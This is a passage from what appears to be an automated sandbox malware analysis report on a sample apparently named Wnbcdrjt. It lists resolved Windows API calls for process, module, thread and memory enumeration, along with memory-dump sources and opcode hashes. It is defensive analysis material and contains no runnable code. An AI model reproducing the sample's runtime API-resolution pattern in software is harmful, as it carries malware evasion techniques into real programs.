                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C8A99A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C8A9AC
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C8A9BE
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C8A9D0
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C8A9E2
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C8A9F4
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C8AA06
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C8AA18
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C8AA2A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C8AA3C
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C8AA4E
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C8AA60
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C8AA72
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C8AA84
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C8AA96
                                        • Process32First.KERNEL32(?,00000128), ref: 02C8AC09
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                        • String ID:
                                        • API String ID: 2774106396-0
                                        • Opcode ID: 5ee7e4b314892dd0fc8e00faa27f78e0677c7436a0ecbd54a9009c8339cc2861
                                        • Instruction ID: 4fec626ff2c546eb431f1742316569d060d3f68ff939c5d1bf5a90b371a7b232
                                        • Opcode Fuzzy Hash: 5ee7e4b314892dd0fc8e00faa27f78e0677c7436a0ecbd54a9009c8339cc2861
                                        • Instruction Fuzzy Hash: A7C04CA77166205B9B1076F93D889D7978DCE891BA31989B3F609D3103E76A8C10A6A0
                                        Function 02C9BB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • timeSetEvent.WINMM(?,00000000), ref: 02C9BB60
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Eventtime
                                        • String ID:
                                        • API String ID: 2982266575-0
                                        • Opcode ID: 88cd70b361192406ecd53068890c7e608c84971bd8593b237b5641022a0588fd
                                        • Instruction ID: b7d9c3eca8d6c18ba4dc0f2b0c4c3c2bac6fa423a953cb4776f116cd3f404ab7
                                        • Opcode Fuzzy Hash: 88cd70b361192406ecd53068890c7e608c84971bd8593b237b5641022a0588fd
                                        • Instruction Fuzzy Hash: CCC092F17843023EFA209AA82CC2F23A28EE704B04FB00816BA00FE2D1D5E25D601A34
                                        Function 02C74BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C74BEB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                        • Instruction ID: 0a43feb603c08dac3849ccf385f1b0e0b22c1d35588e873504e22a1b70a0c29a
                                        • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                        • Instruction Fuzzy Hash: 9DB0027C24860259FB7855620D41B7601AD5BF1787F8910D1DE39D81D0FF45C911DC77
                                        Function 02C74BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SysFreeString.OLEAUT32(00000000), ref: 02C74C03
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: FreeString
                                        • String ID:
                                        • API String ID: 3341692771-0
                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                        • Instruction ID: e6b8eda2a9d4b8ce30ae7e9217c112c207b3832a0683db53fb96d27b73279fe7
                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                        • Instruction Fuzzy Hash: 03A022AC000B030A8F2F232C0A0002A2033BFF03023CEC0E800000A0208F3A8000BC30